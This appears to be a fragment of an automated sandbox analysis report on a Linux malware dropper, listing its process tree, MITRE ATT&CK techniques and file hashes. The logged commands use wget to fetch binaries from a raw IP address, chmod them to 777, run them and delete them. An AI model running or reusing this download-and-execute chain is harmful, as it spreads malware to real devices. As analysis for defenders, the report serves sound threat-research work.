- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵PID:874
-
-
/bin/chmodchmod 777 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil./2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵PID:877
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵PID:878
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97